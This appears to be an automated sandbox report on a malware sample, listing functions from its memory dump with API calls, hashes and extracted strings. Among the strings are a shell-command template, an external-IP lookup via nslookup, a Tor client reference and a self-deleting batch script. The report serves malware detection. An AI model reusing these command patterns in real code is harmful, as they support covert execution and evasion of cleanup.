                                                                                                                                        • Opcode ID: 16c2a4d5193939640236b72863c569b14a339a6b75c616028462f7eb6bbd3420
                                                                                                                                        • Instruction ID: 54a1fcce1564334dd82a6fe0322ed71d55e0b4a44e38c45b0c7b3ed12defd848
                                                                                                                                        • Opcode Fuzzy Hash: 16c2a4d5193939640236b72863c569b14a339a6b75c616028462f7eb6bbd3420
                                                                                                                                        • Instruction Fuzzy Hash: D5215071A00208BBDB119A95CC45F9BBBACDF04754F144062FD04DA292E7B4DE488B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044A704, Relevance: 15.1, APIs: 10, Instructions: 64sleepsynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(?,00461363), ref: 0044A718
                                                                                                                                          • Part of subcall function 00442D6E: InterlockedExchange.KERNEL32(?,000000FF), ref: 00442D75
                                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF,000000FF,?), ref: 0044A732
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044A73B
                                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 0044A749
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0044A755
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0044A77E
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0044A78D
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0044A79A
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0044A7A8
                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 0044A7B2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1408595562-0
                                                                                                                                        • Opcode ID: c0da907ea231392dabc080bc3f3a1d2cd238a25fa3dc153afc5ce6d89ccf8530
                                                                                                                                        • Instruction ID: 906ec0706832aff12669af5e96a993e08fb1e84f29d336387f648b24863c9eab
                                                                                                                                        • Opcode Fuzzy Hash: c0da907ea231392dabc080bc3f3a1d2cd238a25fa3dc153afc5ce6d89ccf8530
                                                                                                                                        • Instruction Fuzzy Hash: BE11ACB1180615EFEB306F61DC8894B77B8BF047013054A2EF54292661EB78E814CB2A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045F2EC, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 0045F31C
                                                                                                                                        • StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 0045F339
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045F36F
                                                                                                                                        • RtlImageNtHeader.NTDLL(?), ref: 0045F39D
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,?,?), ref: 0045F460
                                                                                                                                          • Part of subcall function 0044D57C: lstrlen.KERNEL32(?,?,ss: *.*.*.*,00000000,0045380B,00000000,?,?,?,?,000000FF,?,00000F00), ref: 0044D585
                                                                                                                                          • Part of subcall function 0044D57C: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,000000FF,?,00000F00), ref: 0044D5A8
                                                                                                                                          • Part of subcall function 0044D57C: memset.NTDLL ref: 0044D5B7
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0045F40D
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0045F43E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                                                                                                        • String ID: TorClient
                                                                                                                                        • API String ID: 239510280-3399603969
                                                                                                                                        • Opcode ID: c4ea089fc2b69a4d0b8726af36594152bfb2e46848dc1d304ba09499484852ab
                                                                                                                                        • Instruction ID: 73432d6a326130add326797fa383e13419b0e3ebefb26f4b7951bc5416a65daa
                                                                                                                                        • Opcode Fuzzy Hash: c4ea089fc2b69a4d0b8726af36594152bfb2e46848dc1d304ba09499484852ab
                                                                                                                                        • Instruction Fuzzy Hash: 6041E531604341ABE7116F25EC45F2B77A9AB55716F04043AFD44A62A2EBF88C4C875F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004538EF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000001,00000000,00000000,74B05520,0044F634,74B05520,00000001,@ID@,x2F,?), ref: 00453906
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00453916
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045394A
                                                                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00453975
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 00453994
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 004539F5
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00453A17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                                                                                                        • String ID: W
                                                                                                                                        • API String ID: 3204852930-655174618
                                                                                                                                        • Opcode ID: 1999589962fb351fd5080ef06c280a5b3899424377da9502019eac2186cac85d
                                                                                                                                        • Instruction ID: aa98c9228dd412364ac10b006f011ddae0e373a182ca82c7951474505704372a
                                                                                                                                        • Opcode Fuzzy Hash: 1999589962fb351fd5080ef06c280a5b3899424377da9502019eac2186cac85d
                                                                                                                                        • Instruction Fuzzy Hash: E44149B1900209EFCF01CF95CC80AAE7BB8FF04386F14442AED0497212E7759E58DBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00462C09, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 00462C2A
                                                                                                                                          • Part of subcall function 0045AF73: lstrlenW.KERNEL32(00000000,00000000,00000000,%APPDATA%\Microsoft\,?), ref: 0045AF98
                                                                                                                                          • Part of subcall function 0045AF73: RtlAllocateHeap.NTDLL(00000000,?), ref: 0045AFAA
                                                                                                                                          • Part of subcall function 0045AF73: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0045AFC7
                                                                                                                                          • Part of subcall function 0045AF73: lstrlenW.KERNEL32(00000000), ref: 0045AFD3
                                                                                                                                          • Part of subcall function 0045AF73: HeapFree.KERNEL32(00000000,00000000), ref: 0045AFE7
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 00462C62
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00462C70
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,.dll,00000000,00001000,00000000,00000000,?), ref: 00462D28
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00462D37
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,.dll,00000000,00001000,00000000,00000000,?), ref: 00462D4A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                                                                                                                        • String ID: .dll$.exe
                                                                                                                                        • API String ID: 1719504581-724907077
                                                                                                                                        • Opcode ID: b05c265982c1a11c56ebb87c6c3b37fd6bdf8aa95f5538bab1aff7088bc5209b
                                                                                                                                        • Instruction ID: c61a4349f486c9a52036521e9830da2c0a594668447ace91356192626860b2e5
                                                                                                                                        • Opcode Fuzzy Hash: b05c265982c1a11c56ebb87c6c3b37fd6bdf8aa95f5538bab1aff7088bc5209b
                                                                                                                                        • Instruction Fuzzy Hash: C1419435A00A05FBDB219F95CE84B9F77B9AB44704F00412AF504A6260FBF8DD45CB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045A4A8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110memoryfilestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(0046DF6C), ref: 0045A4BA
                                                                                                                                        • lstrcpy.KERNEL32(00000000), ref: 0045A4EF
                                                                                                                                          • Part of subcall function 00449C8C: lstrlen.KERNEL32(?,00000008,00000000,?,74B05520,00458DBF,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00449C9B
                                                                                                                                          • Part of subcall function 00449C8C: mbstowcs.NTDLL ref: 00449CB7
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0045A580
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045A597
                                                                                                                                        • InterlockedDecrement.KERNEL32(0046DF6C), ref: 0045A5AE
                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0045A5CF
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0045A5DF
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                                                                                                                        • String ID: .avi
                                                                                                                                        • API String ID: 908044853-1706533258
                                                                                                                                        • Opcode ID: c001a98e0b54f8f2a2bb2f3540ea9634388201219c03133568abd6ea4d0e519f
                                                                                                                                        • Instruction ID: 787e777f6c29e830c685f40bd343b16c91a0bc8f9dfbc640ad267b47394975fa
                                                                                                                                        • Opcode Fuzzy Hash: c001a98e0b54f8f2a2bb2f3540ea9634388201219c03133568abd6ea4d0e519f
                                                                                                                                        • Instruction Fuzzy Hash: 5A312731E00118FBCB115BA5DC04AAE7BB4AB48752F114526FD04A7151F6B88E54979B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004477E8, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • memset.NTDLL ref: 00447833
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000008), ref: 004478AB
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 004478C3
                                                                                                                                        • GetLastError.KERNEL32(0045A5EE,?,?), ref: 004478DB
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 004478E7
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 004478F6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$AllocateErrorHeapLastmemset
                                                                                                                                        • String ID: \lF$flF
                                                                                                                                        • API String ID: 2000578454-3831591296
                                                                                                                                        • Opcode ID: 0cfcbccf9dffd48cf970620a4086cc42b979e56d3cd24ad874cd8b9a45764545
                                                                                                                                        • Instruction ID: 1db1a5eeaf458502f3fa6b2da34754c85af0ed4f3cdc76f410a518e14e151946
                                                                                                                                        • Opcode Fuzzy Hash: 0cfcbccf9dffd48cf970620a4086cc42b979e56d3cd24ad874cd8b9a45764545
                                                                                                                                        • Instruction Fuzzy Hash: A841AEB0900305AFE721DF65CC44BAABBF8FF08354F10862EE949D7290E7B49A04CB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045374D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88memoryfilestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,00000F00), ref: 00453771
                                                                                                                                          • Part of subcall function 00463BCF: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,0045378E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00463BE0
                                                                                                                                          • Part of subcall function 00463BCF: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,0045378E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00463BE7
                                                                                                                                          • Part of subcall function 00463BCF: RtlAllocateHeap.NTDLL(00000000,?), ref: 00463BF9
                                                                                                                                          • Part of subcall function 00463BCF: _snprintf.NTDLL ref: 00463C1C
                                                                                                                                          • Part of subcall function 00463BCF: _snprintf.NTDLL ref: 00463C45
                                                                                                                                          • Part of subcall function 00463BCF: HeapFree.KERNEL32(00000000,?,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 00463C66
                                                                                                                                        • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 004537FD
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 0045381A
                                                                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,?,?,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00453822
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00453831
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                                                                                                                        • String ID: s:$nslookup myip.opendns.com resolver1.opendns.com $ss: *.*.*.*
                                                                                                                                        • API String ID: 2960378068-949792001
                                                                                                                                        • Opcode ID: 9e30d47c2ae4e748a412c0164ad8467bcf44356c5ecc200bfbda780fee3ca880
                                                                                                                                        • Instruction ID: 808dacf112bdea08f110dfcf402dec1fe8ff1abd4db522f1aa0d7afd3a28eefd
                                                                                                                                        • Opcode Fuzzy Hash: 9e30d47c2ae4e748a412c0164ad8467bcf44356c5ecc200bfbda780fee3ca880
                                                                                                                                        • Instruction Fuzzy Hash: 1E218171E00145BBDB10AFE9CC84FDF7BECAB19316F00056AF505E2242FBB49A048769
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00454A46, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82stringfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 00454A5E
                                                                                                                                        • lstrcmpiW.KERNEL32(00000000,0065002E,?,00000000), ref: 00454A95
                                                                                                                                        • lstrcmpiW.KERNEL32(?,0064002E,?,00000000), ref: 00454AAA
                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000000), ref: 00454AB1
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 00454AD9
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00454B05
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00454B22
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                                                                                                                        • String ID: \gF
                                                                                                                                        • API String ID: 1496873005-803477251
                                                                                                                                        • Opcode ID: 8fcc9364d18a24dd33c7c0092bea8c200630e2fc08b77972956b61c093787658
                                                                                                                                        • Instruction ID: 92d177b37b88ed936741aa5b2635aebb05f845d91f2d313e806c5373e26e1049
                                                                                                                                        • Opcode Fuzzy Hash: 8fcc9364d18a24dd33c7c0092bea8c200630e2fc08b77972956b61c093787658
                                                                                                                                        • Instruction Fuzzy Hash: 362153B1A00205ABDB109FB1DC84E5F77BCEF4474AB040529E906D6212EBB8ED49CB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045D395, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(004589A2,00000000,`F,0046E280,?,?,004589A2,00450C92,?), ref: 0045D3A5
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0045D3BB
                                                                                                                                        • lstrlen.KERNEL32(00450C92,?,?,004589A2,00450C92,?), ref: 0045D3C3
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045D3CF
                                                                                                                                        • lstrcpy.KERNEL32(?,004589A2), ref: 0045D3E5
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,004589A2,00450C92,?), ref: 0045D439
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,004589A2,00450C92,?), ref: 0045D448
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                                                                                                                        • String ID: `F
                                                                                                                                        • API String ID: 1531811622-3520748611
                                                                                                                                        • Opcode ID: 294bc3b6bb2728956b59163e99a00399d6d25d6240baf4b2bbcdc50a4bd17408
                                                                                                                                        • Instruction ID: b7a991f6ed582c13d384d4800fa79764190685b938b3b66994837e15337b2d89
                                                                                                                                        • Opcode Fuzzy Hash: 294bc3b6bb2728956b59163e99a00399d6d25d6240baf4b2bbcdc50a4bd17408
                                                                                                                                        • Instruction Fuzzy Hash: C6212931A04284BFEB224F68DC44F6B7F6AEF56310F044079EC4597262D7B5AC4AC769
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004614CB, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,00460CAA,00000000), ref: 004614EF
                                                                                                                                          • Part of subcall function 00447B3D: lstrcpy.KERNEL32(-000000FC,00000000), ref: 00447B77
                                                                                                                                          • Part of subcall function 00447B3D: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 00447B89
                                                                                                                                          • Part of subcall function 00447B3D: GetTickCount.KERNEL32 ref: 00447B94
                                                                                                                                          • Part of subcall function 00447B3D: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 00447BA0
                                                                                                                                          • Part of subcall function 00447B3D: lstrcpy.KERNEL32(00000000), ref: 00447BBA
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • lstrcpy.KERNEL32(00000000), ref: 0046151F
                                                                                                                                        • wsprintfA.USER32 ref: 00461532
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00461547
                                                                                                                                        • wsprintfA.USER32 ref: 00461555
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                                                                                                                        • String ID: "%S"$.bat$attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0
                                                                                                                                        • API String ID: 1152860224-2880143881
                                                                                                                                        • Opcode ID: a84bcec2f03b1a87fc822622cb7985edadbac10971cde107262f743a6cdd5055
                                                                                                                                        • Instruction ID: a98bf99beefbf30505a9040d5b2f1688c02d0bebbd50316eeacb6702129fe827
                                                                                                                                        • Opcode Fuzzy Hash: a84bcec2f03b1a87fc822622cb7985edadbac10971cde107262f743a6cdd5055
                                                                                                                                        • Instruction Fuzzy Hash: D511E7729013157BD210BB665C49E5F7A9CEF80755F05482FF946A2212EEBCAC0486BF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00463BCF, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,0045378E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00463BE0
                                                                                                                                        • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,0045378E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00463BE7
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00463BF9
                                                                                                                                        • _snprintf.NTDLL ref: 00463C1C
                                                                                                                                          • Part of subcall function 0045E99C: memset.NTDLL ref: 0045E9B1
                                                                                                                                          • Part of subcall function 0045E99C: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045E9EA
                                                                                                                                          • Part of subcall function 0045E99C: wcstombs.NTDLL ref: 0045E9F4
                                                                                                                                          • Part of subcall function 0045E99C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045EA25
                                                                                                                                          • Part of subcall function 0045E99C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,*<F), ref: 0045EA51
                                                                                                                                          • Part of subcall function 0045E99C: TerminateProcess.KERNEL32(?,000003E5), ref: 0045EA67
                                                                                                                                          • Part of subcall function 0045E99C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 0045EA7B
                                                                                                                                          • Part of subcall function 0045E99C: CloseHandle.KERNEL32(?), ref: 0045EAAE
                                                                                                                                          • Part of subcall function 0045E99C: CloseHandle.KERNEL32(?), ref: 0045EAB3
                                                                                                                                        • _snprintf.NTDLL ref: 00463C45
                                                                                                                                          • Part of subcall function 0045E99C: GetLastError.KERNEL32 ref: 0045EA7F
                                                                                                                                          • Part of subcall function 0045E99C: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0045EA9F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 00463C66
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                                                                                                                        • String ID: cmd /C "%s> %s1"$echo -------- >
                                                                                                                                        • API String ID: 1481739438-1722754249
                                                                                                                                        • Opcode ID: 6544aba379b81ae222e9d760c09f884bf354b36387b9aaefc2c9e1d319e457e4
                                                                                                                                        • Instruction ID: a425378baec505b1fb83a050fa39991c5cce811f14dd4dbf1eb6b1c7784c8970
                                                                                                                                        • Opcode Fuzzy Hash: 6544aba379b81ae222e9d760c09f884bf354b36387b9aaefc2c9e1d319e457e4
                                                                                                                                        • Instruction Fuzzy Hash: 5D11BC72900118BBCF125F54DC41D9E7F39EF48360F15412AFD08A6261E7B69E60DBEA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045346E, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55memoryregistrystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00450C92,00000000,00000000,0046E280,?,?,004589B1,00450C92,00000000,00450C92,?), ref: 00453481
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0045348F
                                                                                                                                        • wsprintfA.USER32 ref: 004534A4
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,?,00000000), ref: 004534BC
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 004534CB
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004534E4
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 004534F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
                                                                                                                                        • String ID: @%s@
                                                                                                                                        • API String ID: 3908752696-4128794767
                                                                                                                                        • Opcode ID: aca2752fdab74b156899dc4626d0b21c8cda306e6304885d7ba4dc4813db181a
                                                                                                                                        • Instruction ID: df56da19582399c6bdf8864ac9af09c001413de26f8678a3d9f7c13b9c79f62c
                                                                                                                                        • Opcode Fuzzy Hash: aca2752fdab74b156899dc4626d0b21c8cda306e6304885d7ba4dc4813db181a
                                                                                                                                        • Instruction Fuzzy Hash: F5019E36A00208BFEB021F95EC49FAA3B79FB49751F104035FA0591161FBF29D18DB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00459DB3, Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 120stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459DD5
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459DE6
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459DF8
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459E0A
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459E1C
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459E28
                                                                                                                                        Strings
